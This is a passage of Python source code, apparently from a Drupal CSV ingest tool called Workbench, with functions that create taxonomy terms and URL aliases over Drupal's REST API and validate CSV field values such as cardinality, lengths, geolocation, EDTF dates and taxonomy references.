            "provided in the CSV data exceeds Drupal's maximum length of 255 characters."
        message_2 = ' It has been truncated to "' + truncated_term_name + '".'
        logging.info(message + message_2)
        term_name = truncated_term_name

    term = {
        "vid": [
            {
                "target_id": vocab_id,
                "target_type": "taxonomy_vocabulary"
            }
        ],
        "status": [
            {
                "value": True
            }
        ],
        "name": [
            {
                "value": term_name
            }
        ],
        "description": [
            {
                "value": "",
                "format": None
            }
        ],
        "weight": [
            {
                "value": 0
            }
        ],
        "parent": [
            {
                "target_id": None
            }
        ],
        "default_langcode": [
            {
                "value": True
            }
        ],
        "path": [
            {
                "alias": None,
                "pid": None,
                "langcode": "en"
            }
        ]
    }

    term_endpoint = config['host'] + '/taxonomy/term?_format=json'
    headers = {'Content-Type': 'application/json'}
    response = issue_request(
        config,
        'POST',
        term_endpoint,
        headers,
        term,
        None)
    if response.status_code == 201:
        term_response_body = json.loads(response.text)
        tid = term_response_body['tid'][0]['value']
        logging.info(
            'Term %s ("%s") added to vocabulary "%s".',
            tid,
            term_name,
            vocab_id)
        return tid
    else:
        logging.warning(
            "Term '%s' not created, HTTP response code was %s.",
            term_name,
            response.status_code)
        return False
def create_url_alias(config, node_id, url_alias):
    """Create a URL (path) alias for a node, logging an error if Drupal
    rejects the request (e.g., the alias already exists).
    """
    # Named 'alias_json' to avoid shadowing the imported json module.
    alias_json = {
        'path': [
            {'value': '/node/' + str(node_id)}
        ],
        'alias': [
            {'value': url_alias}
        ]
    }

    headers = {'Content-Type': 'application/json'}
    response = issue_request(
        config,
        'POST',
        config['host'] +
        '/entity/path_alias?_format=json',
        headers,
        alias_json,
        None)
    if response.status_code != 201:
        logging.error(
            "URL alias '%s' not created for node %s, HTTP response code was %s (it might already exist).",
            url_alias,
            config['host'] +
            '/node/' +
            node_id,
            response.status_code)
def prepare_term_id(config, vocab_ids, term):
    """REST POST and PATCH operations require taxonomy term IDs, not term names. This
    funtion checks its 'term' argument to see if it's numeric (i.e., a term ID) and
    if it is, returns it as is. If it's not (i.e., a term name) it looks for the
    term name in the referenced vocabulary and returns its term ID (existing or
    newly created).

    NOTE(review): several paths return None implicitly — an 'http' term whose
    URI doesn't resolve, and a multi-vocabulary term name that isn't
    namespaced with 'vocab_id:'. Confirm that callers handle None.
    """
    term = str(term)
    term = term.strip()
    if value_is_numeric(term):
        # Already a term ID.
        return term
    # Special case: if the term starts with 'http', assume it's a Linked Data URI
    # and get its term ID from the URI.
    elif term.startswith('http'):
        # Note: get_term_from_uri() will return False if the URI doesn't match
        # a term.
        tid_from_uri = get_term_id_from_uri(config, term)
        if value_is_numeric(tid_from_uri):
            return tid_from_uri
    else:
        if len(vocab_ids) == 1:
            # Single vocabulary: the term name is unambiguous, so create (or
            # fetch) the term directly.
            tid = create_term(config, vocab_ids[0].strip(), term.strip())
            return tid
        else:
            # Term names used in mult-taxonomy fields. They need to be namespaced with
            # the taxonomy ID.
            #
            # If the field has more than one vocabulary linked to it, we don't know which
            # vocabulary the user wants a new term to be added to, and if the term name is
            # already used in any of the taxonomies linked to this field, we also don't know
            # which vocabulary to look for it in to get its term ID. Therefore, we always need
            # to namespace term names if they are used in multi-taxonomy fields. If people want
            # to use term names that contain a colon, they need to add them to Drupal first
            # and use the term ID. Workaround PRs welcome.
            #
            # Split the namespace/vocab ID from the term name on ':'.
            namespaced = re.search(':', term)
            if namespaced:
                [vocab_id, term_name] = term.split(':')
                tid = create_term(config, vocab_id.strip(), term_name.strip())
                return tid
def get_field_vocabularies(config, field_definitions, field_name):
    """Return the IDs of vocabularies linked from the given field (there may
    be more than one), or False if the field has none registered.
    """
    definition = field_definitions[field_name]
    if 'vocabularies' not in definition:
        return False
    return definition['vocabularies']
def value_is_numeric(value):
    """Return True if value, converted to a string and stripped of
    surrounding whitespace, consists solely of numeric characters.
    """
    return str(value).strip().isnumeric()
def compare_strings(known, unknown):
    """Normalize both strings and compare them, returning True on a match
    and False otherwise. Normalization trims surrounding whitespace,
    lower-cases, converts punctuation to spaces, and collapses runs of
    whitespace. We could use FuzzyWuzzy or something but this is probably
    sufficient.
    """
    # Translation table mapping every punctuation character to a space.
    punctuation_to_space = str.maketrans(
        string.punctuation, ' ' * len(string.punctuation))

    def normalize(text):
        return ' '.join(
            text.strip().lower().translate(punctuation_to_space).split())

    return normalize(unknown) == normalize(known)
def get_csv_record_hash(row):
    """Return an MD5 hex digest over the concatenated values of a CSV record.

    Only str and int values participate. Int values are converted to str in
    the row itself (preserving the original in-place normalization).
    Whitespace in each value is collapsed, and the concatenation is trimmed
    and lower-cased before hashing.
    """
    pieces = []
    for field in row:
        if isinstance(row[field], (str, int)):
            if isinstance(row[field], int):
                # Normalize int values to strings in place, as callers rely on.
                row[field] = str(row[field])
            collapsed = ' '.join(row[field].strip().split())
            pieces.append(collapsed + ' ')
    serialized = ''.join(pieces).strip().lower()
    return hashlib.md5(serialized.encode('utf-8')).hexdigest()
def validate_csv_field_cardinality(config, field_definitions, csv_data):
    """Compare values in the CSV data with the fields' cardinality. Log CSV
    fields that have more values than allowed, and warn user if
    these fields exist in their CSV data.
    """
    # Map CSV column name -> positive cardinality for columns that have one.
    field_cardinalities = dict()
    csv_headers = csv_data.fieldnames
    for csv_header in csv_headers:
        if csv_header in field_definitions.keys():
            cardinality = field_definitions[csv_header]['cardinality']
            # We don't care about cardinality of -1 (unlimited).
            if int(cardinality) > 0:
                field_cardinalities[csv_header] = cardinality

    for count, row in enumerate(csv_data, start=1):
        for field_name in field_cardinalities.keys():
            if field_name in row:
                # Don't check for the subdelimiter in title.
                if field_name == 'title':
                    continue
                delimited_field_values = row[field_name].split(config['subdelimiter'])
                # NOTE(review): the literal "(!)" in the create-task messages
                # below looks like a leftover debug marker (the update-task
                # messages have no equivalent) — confirm.
                if field_cardinalities[field_name] == 1 and len(delimited_field_values) > 1:
                    if config['task'] == 'create':
                        message = 'CSV field "' + field_name + '" in (!) record with ID ' + \
                            row[config['id_field']] + ' contains more values than the number '
                    if config['task'] == 'update':
                        message = 'CSV field "' + field_name + '" in record with node ID ' \
                            + row['node_id'] + ' contains more values than the number '
                    message_2 = 'allowed for that field (' + str(
                        field_cardinalities[field_name]) + '). Workbench will add only the first value.'
                    print('Warning: ' + message + message_2)
                    logging.warning(message + message_2)
                if int(field_cardinalities[field_name]) > 1 and len(delimited_field_values) > field_cardinalities[field_name]:
                    if config['task'] == 'create':
                        message = 'CSV field "' + field_name + '" in (!) record with ID ' + \
                            row[config['id_field']] + ' contains more values than the number '
                    if config['task'] == 'update':
                        message = 'CSV field "' + field_name + '" in record with node ID ' \
                            + row['node_id'] + ' contains more values than the number '
                    message_2 = 'allowed for that field (' + str(
                        field_cardinalities[field_name]) + '). Workbench will add only the first ' + str(
                        field_cardinalities[field_name]) + ' values.'
                    print('Warning: ' + message + message_2)
                    logging.warning(message + message_2)
def validate_csv_field_length(config, field_definitions, csv_data):
    """Compare values in the CSV data with the fields' max_length. Log CSV
    fields that exceed their max_length, and warn user if these fields
    exist in their CSV data. (Such values are truncated later, when
    records are pushed to Drupal.)
    """
    # Map CSV column name -> max_length for columns that have one configured.
    field_max_lengths = dict()
    for csv_header in csv_data.fieldnames:
        definition = field_definitions.get(csv_header)
        if definition is None:
            continue
        max_length = definition.get('max_length')
        # A max_length of None means "not applicable" or unlimited.
        if max_length is not None:
            field_max_lengths[csv_header] = max_length

    for count, row in enumerate(csv_data, start=1):
        for field_name, max_length in field_max_lengths.items():
            if field_name not in row:
                continue
            for field_value in row[field_name].split(config['subdelimiter']):
                if len(field_value) <= int(max_length):
                    continue
                if config['task'] == 'create':
                    message = 'CSV field "' + field_name + '" in record with ID ' + \
                        row[config['id_field']] + ' contains a value that is longer (' + str(len(field_value)) + ' characters)'
                if config['task'] == 'update':
                    message = 'CSV field "' + field_name + '" in record with node ID ' + \
                        row['node_id'] + ' contains a value that is longer (' + str(len(field_value)) + ' characters)'
                message_2 = ' than allowed for that field (' + str(
                    max_length) + ' characters). Workbench will truncate this value prior to populating Drupal.'
                print('Warning: ' + message + message_2)
                logging.warning(message + message_2)
def validate_geolocation_fields(config, field_definitions, csv_data):
    """Validate lat,long values in fields that are of type 'geolocation'.
    Exits with a logged error on the first invalid value; otherwise prints
    and logs a confirmation when any geolocation fields were present.
    """
    geolocation_fields_present = False
    for count, row in enumerate(csv_data, start=1):
        for field_name, definition in field_definitions.items():
            if definition['field_type'] != 'geolocation':
                continue
            if field_name not in row:
                continue
            geolocation_fields_present = True
            for field_value in row[field_name].split(config['subdelimiter']):
                stripped_value = field_value.strip()
                # Empty subvalues are permitted.
                if not len(stripped_value):
                    continue
                if not validate_latlong_value(stripped_value):
                    message = 'Value in field "' + field_name + '" in row ' + str(count) + \
                        ' (' + field_value + ') is not a valid lat,long pair.'
                    logging.error(message)
                    sys.exit('Error: ' + message)

    if geolocation_fields_present is True:
        message = "OK, geolocation field values in the CSV file validate."
        print(message)
        logging.info(message)
def validate_latlong_value(latlong):
    """Return True if *latlong* is a valid "lat,long" pair, False otherwise.

    Latitude must be in [-90, 90] and longitude in [-180, 180]; an optional
    leading +/- sign and decimal fraction are accepted on each component.
    """
    # Remove leading \ that may be present if input CSV is from a spreadsheet.
    candidate = latlong.lstrip('\\')
    latlong_pattern = (
        r"^[-+]?([1-8]?\d(\.\d+)?|90(\.0+)?),"
        r"\s*[-+]?(180(\.0+)?|((1[0-7]\d)|([1-9]?\d))(\.\d+)?)$"
    )
    return bool(re.match(latlong_pattern, candidate))
def validate_term_name_length(term_name, row_number, column_name):
    """Checks that the length of a term name does not exceed
       Drupal's 255 character length.

    Exits via sys.exit() when the (whitespace-stripped) name is too long;
    otherwise returns None.
    """
    stripped_term_name = term_name.strip()
    if len(stripped_term_name) <= 255:
        return
    message = 'CSV field "' + column_name + '" in record ' + row_number + \
        " contains a taxonomy term that exceeds Drupal's limit of 255 characters (length of term is " + str(len(stripped_term_name)) + ' characters).'
    message_2 = ' Term provided in CSV is "' + stripped_term_name + '".'
    message_3 = " Please reduce the term's length to less than 256 characters."
    logging.error(message + message_2 + message_3)
    sys.exit(
        'Error: ' +
        message +
        ' See the Workbench log for more information.')
def validate_node_created_date(csv_data):
    """Checks that date_string is in the format used by Drupal's 'created' node property,
    e.g., 2020-11-15T23:49:22+00:00. Also check to see if the date is in the future.

    Exits via sys.exit() on the first badly formatted or future-dated value.
    """
    for count, row in enumerate(csv_data, start=1):
        for field_name, field_value in row.items():
            if field_name == 'created' and len(field_value) > 0:
                if not validate_node_created_date_string(field_value):
                    message = 'CSV field "created" in record ' + \
                        str(count) + ' contains a date "' + field_value + '" that is not formatted properly.'
                    logging.error(message)
                    sys.exit('Error: ' + message)

                now = datetime.datetime.now()
                # Remove the GMT differential at the end of the time string
                # so strptime can parse the remainder.
                # NOTE(review): this drops the UTC offset and compares against
                # naive local time, so "future" is approximate — confirm this
                # tolerance is acceptable.
                date_string_trimmed = re.sub(
                    r'[+-]\d\d:\d\d$', '', field_value)
                created_date = datetime.datetime.strptime(
                    date_string_trimmed, '%Y-%m-%dT%H:%M:%S')
                if created_date > now:
                    message = 'CSV field "created" in record ' + \
                        str(count) + ' contains a date "' + field_value + '" that is in the future.'
                    logging.error(message)
                    sys.exit('Error: ' + message)

    # Bug fix: the previous success message claimed the dates were "in the
    # future", which is precisely the condition this function rejects; it
    # also misspelled "formatted".
    message = 'OK, dates in the "created" CSV field are all formatted correctly and none are in the future.'
    print(message)
    logging.info(message)
def validate_node_created_date_string(created_date_string):
    """Return True if *created_date_string* matches Drupal's 'created'
    property format (e.g. 2020-11-15T23:49:22+00:00), False otherwise.
    """
    drupal_created_format = r"^\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d[+-]\d\d:\d\d$"
    return re.match(drupal_created_format, created_date_string) is not None
def validate_edtf_fields(config, field_definitions, csv_data):
    """Validate values in fields that are of type 'edtf'.

    Each subdelimited value is checked with validate_edtf_value(). Exits via
    sys.exit() on the first invalid value; prints/logs a summary only when
    at least one EDTF field was present in the CSV.
    """
    edtf_fields_present = False
    for count, row in enumerate(csv_data, start=1):
        for field_name in field_definitions.keys():
            if field_definitions[field_name]['field_type'] == 'edtf':
                if field_name in row:
                    edtf_fields_present = True
                    delimited_field_values = row[field_name].split(config['subdelimiter'])
                    for field_value in delimited_field_values:
                        if len(field_value.strip()):
                            result, validation_message = validate_edtf_value(field_value)
                            if result is False:
                                message = 'Value in field "' + field_name + '" in row ' + str(count) + \
                                    ' ("' + field_value + '") is not a valid EDTF date/time.' + ' ' + validation_message
                                logging.error(message)
                                sys.exit('Error: ' + message)

    if edtf_fields_present is True:
        # Bug fix: the success message previously misspelled "EDTF" as "ETDF".
        message = "OK, EDTF field values in the CSV file validate."
        print(message)
        logging.info(message)
def validate_edtf_value(edtf):
    """Validate one CSV value as EDTF (Extended Date/Time Format).

    Recognizes three shapes of value: intervals ("1964/2008"), sets
    ("[1667,1668,1670..1672]", including open-ended "..1760-12-03" /
    "1760-12-03.." forms), and single dates. Each component date is
    delegated to validate_single_edtf_date().

    Returns a (valid, message) tuple: (True, None) on success, or
    (False, explanation) for the first invalid component.
    """
    edtf = edtf.strip()
    # Value contains an EDTF interval, e.g. ‘1964/2008’
    if '/' in edtf:
        interval_dates = edtf.split('/', 1)
        for interval_date in interval_dates:
            result, message = validate_single_edtf_date(interval_date)
            if result is False:
                return False, 'Interval date "' + interval_date + '"" does not validate.' + ' ' + message
        # If we've made it this far, return True.
        return True, None

    # Value is an EDTF set if it contains a , or .., so it must start with a [ and ends with a ].
    elif edtf.count('.') == 2 or ',' in edtf:
        if not (edtf.startswith('[') and edtf.endswith(']')):
            return False, 'Date set "' + edtf + '" does not contain a leading [ and/or trailing ].'

        # Value contains an EDTF set, e.g. '[1667,1668,1670..1672]'.
        if '[' in edtf:
            # Strip the enclosing brackets before examining the members.
            edtf = edtf.lstrip('[')
            edtf = edtf.rstrip(']')
            if '..' in edtf or ',' in edtf:
                # .. is at beginning of set, e.g. ..1760-12-03
                if edtf.startswith('..'):
                    edtf = edtf.lstrip('..')
                    result, message = validate_single_edtf_date(edtf)
                    if result is False:
                        return False, 'Set date "' + edtf + '"" does not validate.' + ' ' + message
                    else:
                        return True, None
                # .. is at the end of the set, e.g. 1760-12-03..
                if edtf.endswith('..'):
                    edtf = edtf.rstrip('..')
                    result, message = validate_single_edtf_date(edtf)
                    if result is False:
                        return False, 'Set date "' + edtf + '"" does not validate.' + ' ' + message
                    else:
                        return True, None

                # Otherwise validate each member/boundary of the set.
                set_date_boundaries = re.split(r'\.\.|,', edtf)
                for set_date_boundary in set_date_boundaries:
                    result, message = validate_single_edtf_date(set_date_boundary)
                    if result is False:
                        return False, 'Set date "' + set_date_boundary + '"" does not validate.' + ' ' + message
                # If we've made it this far, return True.
                return True, None

    # Assume value is just a single EDTF date.
    else:
        result, message = validate_single_edtf_date(edtf)
        if result is False:
            return False, 'EDTF date "' + edtf + '"" does not validate.' + ' ' + message
        else:
            return True, None
def validate_single_edtf_date(single_edtf):
    """Validate a single EDTF date, optionally carrying a local time
    ("2020-07-11T06:19:51") or EDTF level-1 qualifiers (?, ~, %).

    Returns a (valid, message) tuple: (True, None) when the value is a
    valid EDTF date, (False, explanation) otherwise.
    """
    if 'T' in single_edtf:
        # Date with a local time; no time zone designator is accepted here.
        # if re.search(r'^\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d$', single_edtf):
        if re.search(r'^\d\d\d\d-\d\d-\d\d(T\d\d:\d\d:\d\d)?$', single_edtf):
            return True, None
        else:
            return False, '"' + single_edtf + '" is an invalid EDTF date and local time value.'

    if re.search(r'#|\?|~', single_edtf):
        # Check that each qualifier is attached to the allowed date part:
        # ? after the year, ~ after year-month, % after the full date.
        parts = single_edtf.split('-')
        if parts[0] is not None and re.search('~|%', parts[0]):
            return False, 'Invalid date qualifier in "' + parts[0] + ", must be a ?."
        if len(parts) == 2 and re.search(r'\?|%', parts[1]):
            return False, 'Invalid date qualifier in "' + parts[1] + ", must be a ~."
        if len(parts) == 3 and re.search(r'\?|~', parts[2]):
            return False, 'Invalid date qualifier in "' + parts[2] + ", must be a %."
        # Strip the qualifiers before validating the bare date below.
        for symbol in '%~?':
            single_edtf = single_edtf.replace(symbol, '')

    if re.search(r'^\d{4}-?(\d\d)?-?(\d\d)?$', single_edtf):
        # Pattern matches yyyy, yyyy-mm, or yyyy-mm-dd; confirm it is a
        # real calendar date (e.g. rejects 2020-02-30).
        valid_calendar_date = validate_calendar_date(single_edtf)
        if valid_calendar_date is False:
            return False, '"' + single_edtf + '" is not a valid calendar date.'
        return True, None
    else:
        return False, single_edtf + " is not a valid EDTF date value."
def validate_calendar_date(date_to_validate):
    """Return True if *date_to_validate* (yyyy, yyyy-mm, or yyyy-mm-dd) is a
    valid Gregorian calendar date, False otherwise.

    Missing month/day components default to 1 before the check.
    """
    segments = str(date_to_validate).split('-')
    if len(segments) == 3:
        year, month, day = segments
    if len(segments) == 2:
        year, month = segments
        day = 1
    if len(segments) == 1:
        year = segments[0]
        month = 1
        day = 1
    # datetime.date() raises ValueError for impossible dates (and for
    # non-numeric components via int()).
    try:
        datetime.date(int(year), int(month), int(day))
        return True
    except ValueError:
        return False
def validate_url_aliases(config, csv_data):
    """Checks that URL aliases don't already exist.

    Every non-empty 'url_alias' CSV value must start with a / and must not
    already resolve on the target Drupal; exits via sys.exit() otherwise.
    """
    for record_number, row in enumerate(csv_data, start=1):
        for column_name, alias in row.items():
            if column_name != 'url_alias' or len(alias) == 0:
                continue
            if alias.strip()[0] != '/':
                message = 'CSV field "url_alias" in record ' + \
                    str(record_number) + ' contains an alias "' + alias + '" that is missing its leading /.'
                logging.error(message)
                sys.exit('Error: ' + message)

            # A 200 means the alias already resolves, i.e. is taken.
            # @todo: Add 301 and 302 as acceptable status codes?
            if ping_url_alias(config, alias) == 200:
                message = 'CSV field "url_alias" in record ' + \
                    str(record_number) + ' contains an alias "' + alias + '" that already exists.'
                logging.error(message)
                sys.exit('Error: ' + message)

    message = 'OK, URL aliases do not already exist.'
    print(message)
    logging.info(message)
def validate_node_uid(config, csv_data):
    """Checks that the user identified in the 'uid' field exists in Drupal. Note that
    this does not validate any permissions the user may have.

    Exits via sys.exit() on the first user ID that Drupal reports as missing.
    """
    for record_number, row in enumerate(csv_data, start=1):
        for column_name, uid_value in row.items():
            if column_name != 'uid' or len(uid_value) == 0:
                continue
            # A GET to /user/x?_format=json returns 200 when the user
            # exists and 404 when they do not.
            uid_url = config['host'] + '/user/' + \
                str(uid_value) + '?_format=json'
            uid_response = issue_request(config, 'GET', uid_url)
            if uid_response.status_code == 404:
                message = 'CSV field "uid" in record ' + \
                    str(record_number) + ' contains a user ID "' + uid_value + '" that does not exist in the target Drupal.'
                logging.error(message)
                sys.exit('Error: ' + message)

    message = 'OK, user IDs in the "uid" CSV field all exist.'
    print(message)
    logging.info(message)
def validate_taxonomy_field_values(config, field_definitions, csv_data):
    """Loop through all fields in field_definitions, and if a field
    is a taxonomy reference field, validate all values in the CSV
    data in that field against term IDs in the taxonomies referenced
    by the field. Does not validate Typed Relation fields
    (see validate_typed_relation_field_values()).

    Returns True when at least one vocabulary lookup issue was logged,
    False when none were, or None when the CSV contains no taxonomy
    reference fields at all. Exits via sys.exit() on hard failures.
    """
    # Define a dictionary to store CSV field: term IDs mappings.
    fields_with_vocabularies = dict()
    vocab_validation_issues = False
    # Get all the term IDs for vocabularies referenced in all fields in the CSV.
    for column_name in csv_data.fieldnames:
        if column_name in field_definitions:
            # Typed relation fields are validated separately.
            if field_definitions[column_name]['field_type'] == 'typed_relation':
                continue
            if 'vocabularies' in field_definitions[column_name]:
                vocabularies = get_field_vocabularies(config, field_definitions, column_name)
                # If there are no vocabularies linked to the current field, 'vocabularies'
                # will be False and will throw a TypeError.
                try:
                    num_vocabs = len(vocabularies)
                except BaseException:
                    message = 'Workbench cannot get vocabularies linked to field "' + \
                        column_name + '". Please confirm that field has at least one vocabulary.'
                    logging.error(message)
                    sys.exit('Error: ' + message)
                all_tids_for_field = []
                for vocabulary in vocabularies:
                    terms = get_term_pairs(config, vocabulary)
                    if len(terms) == 0:
                        # An empty term list may mean the View is misconfigured
                        # rather than that the vocabulary is empty, so only warn.
                        if config['allow_adding_terms'] is True:
                            vocab_validation_issues = True
                            message = 'Vocabulary "' + vocabulary + '" referenced in CSV field "' + column_name + \
                                '" may not be enabled in the "Terms in vocabulary" View (please confirm it is) or may contains no terms.'
                            logging.warning(message)
                        else:
                            vocab_validation_issues = True
                            message = 'Vocabulary "' + vocabulary + '" referenced in CSV field "' + column_name + \
                                '" may not enabled in the "Terms in vocabulary" View (please confirm it is) or may contains no terms.'
                            logging.warning(message)
                    vocab_term_ids = list(terms.keys())
                    # If more than one vocab in this field, combine their term IDs into a single list.
                    all_tids_for_field = all_tids_for_field + vocab_term_ids
                fields_with_vocabularies.update({column_name: all_tids_for_field})

    # If none of the CSV fields are taxonomy reference fields, return.
    if len(fields_with_vocabularies) == 0:
        return

    # Iterate through the CSV and validate each taxonomy fields's values.
    new_term_names_in_csv_results = []
    for count, row in enumerate(csv_data, start=1):
        for column_name in fields_with_vocabularies:
            if len(row[column_name]):
                new_term_names_in_csv = validate_taxonomy_reference_value(config, field_definitions, fields_with_vocabularies, column_name, row[column_name], count)
                new_term_names_in_csv_results.append(new_term_names_in_csv)

    if True in new_term_names_in_csv_results and config['allow_adding_terms'] is True:
        print("OK, term IDs/names in CSV file exist in their respective taxonomies (and new terms will be created as noted in the Workbench log).")
    else:
        # All term IDs are in their field's vocabularies.
        print("OK, term IDs/names in CSV file exist in their respective taxonomies.")
        logging.info("OK, term IDs/names in CSV file exist in their respective taxonomies.")

    return vocab_validation_issues
def validate_typed_relation_field_values(config, field_definitions, csv_data):
    """Validate values in fields that are of type 'typed_relation'. Each CSV
    value must have this pattern: "string:string:int" or "string:string:string".
    If the last segment is a string, it must be term name, a namespaced term name,
    or an http URI.

    Returns True when at least one vocabulary lookup issue was logged,
    False when none were, or None when no CSV field references a
    vocabulary. Exits via sys.exit() on hard failures.
    """
    # Define a dictionary to store CSV field: term IDs mappings.
    fields_with_vocabularies = dict()
    # Get all the term IDs for vocabularies referenced in all fields in the CSV.
    vocab_validation_issues = False
    for column_name in csv_data.fieldnames:
        if column_name in field_definitions:
            if 'vocabularies' in field_definitions[column_name]:
                vocabularies = get_field_vocabularies(config, field_definitions, column_name)
                # If there are no vocabularies linked to the current field, 'vocabularies'
                # will be False and will throw a TypeError.
                try:
                    num_vocabs = len(vocabularies)
                except BaseException:
                    message = 'Workbench cannot get vocabularies linked to field "' + \
                        column_name + '". Please confirm that field has at least one vocabulary.'
                    logging.error(message)
                    sys.exit('Error: ' + message)
                all_tids_for_field = []
                for vocabulary in vocabularies:
                    terms = get_term_pairs(config, vocabulary)
                    if len(terms) == 0:
                        # An empty term list may mean the View is misconfigured
                        # rather than that the vocabulary is empty, so only warn.
                        if config['allow_adding_terms'] is True:
                            vocab_validation_issues = True
                            message = 'Vocabulary "' + vocabulary + '" referenced in CSV field "' + column_name + \
                                '" may not be enabled in the "Terms in vocabulary" View (please confirm it is) or may contains no terms.'
                            logging.warning(message)
                        else:
                            vocab_validation_issues = True
                            message = 'Vocabulary "' + vocabulary + '" referenced in CSV field "' + column_name + \
                                '" may not enabled in the "Terms in vocabulary" View (please confirm it is) or may contains no terms.'
                            logging.warning(message)
                    vocab_term_ids = list(terms.keys())
                    # If more than one vocab in this field, combine their term IDs into a single list.
                    all_tids_for_field = all_tids_for_field + vocab_term_ids
                fields_with_vocabularies.update({column_name: all_tids_for_field})

    # If none of the CSV fields are taxonomy reference fields, return.
    if len(fields_with_vocabularies) == 0:
        return

    typed_relation_fields_present = False
    new_term_names_in_csv_results = []
    for count, row in enumerate(csv_data, start=1):
        for field_name in field_definitions.keys():
            if field_definitions[field_name]['field_type'] == 'typed_relation' and 'typed_relations' in field_definitions[field_name]:
                if field_name in row:
                    typed_relation_fields_present = True
                    delimited_field_values = row[field_name].split(config['subdelimiter'])
                    for field_value in delimited_field_values:
                        if len(field_value) == 0:
                            continue
                        # First check the required patterns.
                        if not re.match("^[a-zA-Z]+:[a-zA-Z]+:.+$", field_value.strip()):
                            message = 'Value in field "' + field_name + '" in row ' + str(count) + \
                                ' (' + field_value + ') does not use the pattern required for typed relation fields.'
                            logging.error(message)
                            sys.exit('Error: ' + message)

                        # Then, check to see if the relator string (the first two parts of the
                        # value) exist in the field_definitions[fieldname]['typed_relations'] list.
                        typed_relation_value_parts = field_value.split(':', 2)
                        relator_string = typed_relation_value_parts[0] + ':' + typed_relation_value_parts[1]
                        if relator_string not in field_definitions[field_name]['typed_relations']:
                            message = 'Value in field "' + field_name + '" in row ' + str(count) + \
                                ' contains a relator (' + relator_string + ') that is not configured for that field.'
                            logging.error(message)
                            sys.exit('Error: ' + message)

        # Iterate through the CSV and validate the taxonomy term/name/URI in each field subvalue.
        for column_name in fields_with_vocabularies:
            if len(row[column_name]):
                delimited_field_values = row[column_name].split(config['subdelimiter'])
                delimited_field_values_without_relator_strings = []
                for field_value in delimited_field_values:
                    # Strip the relator string out from field_value, leaving the vocabulary ID and term ID/name/URI.
                    term_to_check = re.sub('^[a-zA-Z]+:[a-zA-Z]+:', '', field_value)
                    delimited_field_values_without_relator_strings.append(term_to_check)

                field_value_to_check = config['subdelimiter'].join(delimited_field_values_without_relator_strings)
                new_term_names_in_csv = validate_taxonomy_reference_value(config, field_definitions, fields_with_vocabularies, column_name, field_value_to_check, count)
                new_term_names_in_csv_results.append(new_term_names_in_csv)

    if typed_relation_fields_present is True and True in new_term_names_in_csv_results and config['allow_adding_terms'] is True:
        print("OK, term IDs/names used in typed relation fields in the CSV file exist in their respective taxonomies (and new terms will be created as noted in the Workbench log).")
    else:
        if typed_relation_fields_present is True:
            # All term IDs are in their field's vocabularies.
            print("OK, term IDs/names used in typed relation fields in the CSV file exist in their respective taxonomies.")
            logging.info("OK, term IDs/names used in typed relation fields in the CSV file exist in their respective taxonomies.")

    return vocab_validation_issues
def validate_taxonomy_reference_value(config, field_definitions, fields_with_vocabularies, csv_field_name, csv_field_value, record_number):
    """Validate one CSV taxonomy-field value (possibly containing multiple
    subdelimited subvalues) against the vocabularies referenced by its field.

    Subvalues may be term IDs (numeric), term URIs ("http..."), or term
    names; names in multi-vocabulary fields must be namespaced as
    "vocab_id:term_name". Exits via sys.exit() on validation failure.

    Returns True if the value contains at least one term name that does not
    yet exist (and will be created when config['allow_adding_terms'] is
    True), False otherwise.
    """
    this_fields_vocabularies = get_field_vocabularies(config, field_definitions, csv_field_name)
    this_fields_vocabularies_string = ', '.join(this_fields_vocabularies)

    new_term_names_in_csv = False

    # Allow for multiple values in one field.
    terms_to_check = csv_field_value.split(config['subdelimiter'])
    for field_value in terms_to_check:
        # If this is a multi-taxonomy field, all term names must be namespaced
        # using the vocab_id:term_name pattern, regardless of whether
        # config['allow_adding_terms'] is True.
        if len(this_fields_vocabularies) > 1 and value_is_numeric(field_value) is not True and not field_value.startswith('http'):
            # URIs are unique so don't need namespacing.
            split_field_values = field_value.split(config['subdelimiter'])
            for split_field_value in split_field_values:
                namespaced = re.search(':', field_value)
                if namespaced:
                    # If the : is present, validate that the namespace is one of
                    # the vocabulary IDs referenced by this field.
                    field_value_parts = field_value.split(':')
                    if field_value_parts[0] not in this_fields_vocabularies:
                        message = 'Vocabulary ID ' + field_value_parts[0] + \
                            ' used in CSV column "' + csv_field_name + '", row ' + str(record_number) + \
                            ' does not match any of the vocabularies referenced by the' + \
                            ' corresponding Drupal field (' + this_fields_vocabularies_string + ').'
                        logging.error(message)
                        sys.exit('Error: ' + message)
                else:
                    message = 'Term names in multi-vocabulary CSV field "' + \
                        csv_field_name + '" require a vocabulary namespace; value '
                    message_2 = '"' + field_value + '" in row ' \
                        + str(record_number) + ' does not have one.'
                    logging.error(message + message_2)
                    sys.exit('Error: ' + message + message_2)

                validate_term_name_length(split_field_value, str(record_number), csv_field_name)

        # Check to see if field_value is a member of the field's vocabularies. First,
        # check whether field_value is a term ID.
        if value_is_numeric(field_value):
            field_value = field_value.strip()
            if int(field_value) not in fields_with_vocabularies[csv_field_name]:
                message = 'CSV field "' + csv_field_name + '" in row ' + \
                    str(record_number) + ' contains a term ID (' + field_value + ') that is '
                if len(this_fields_vocabularies) > 1:
                    message_2 = 'not in one of the referenced vocabularies (' \
                        + this_fields_vocabularies_string + ').'
                else:
                    message_2 = 'not in the referenced vocabulary ("' + \
                        this_fields_vocabularies[0] + '").'
                logging.error(message + message_2)
                sys.exit('Error: ' + message + message_2)
        # Then check values that are URIs.
        elif field_value.startswith('http'):
            tid_from_uri = get_term_id_from_uri(config, field_value)
            if value_is_numeric(tid_from_uri):
                if tid_from_uri not in fields_with_vocabularies[csv_field_name]:
                    message = 'CSV field "' + csv_field_name + '" in row ' + \
                        str(record_number) + ' contains a term URI (' + field_value + ') that is '
                    if len(this_fields_vocabularies) > 1:
                        message_2 = 'not in one of the referenced vocabularies (' \
                            + this_fields_vocabularies_string + ').'
                    else:
                        message_2 = 'not in the referenced vocabulary ("' \
                            + this_fields_vocabularies[0] + '").'
                    logging.error(message + message_2)
                    sys.exit('Error: ' + message + message_2)
            else:
                message = 'Term URI "' + field_value + '" used in CSV column "' + \
                    csv_field_name + '"" row ' + str(record_number) + ' does not match any terms.'
                logging.error(message)
                sys.exit('Error: ' + message)
        # Finally, check values that are string term names.
        else:
            new_terms_to_add = []
            for vocabulary in this_fields_vocabularies:
                tid = find_term_in_vocab(config, vocabulary, field_value)
                if value_is_numeric(tid) is not True:
                    # Single taxonomy fields.
                    if len(this_fields_vocabularies) == 1:
                        if config['allow_adding_terms'] is True:
                            # Warn if namespaced term name is not in specified vocab.
                            if tid is False:
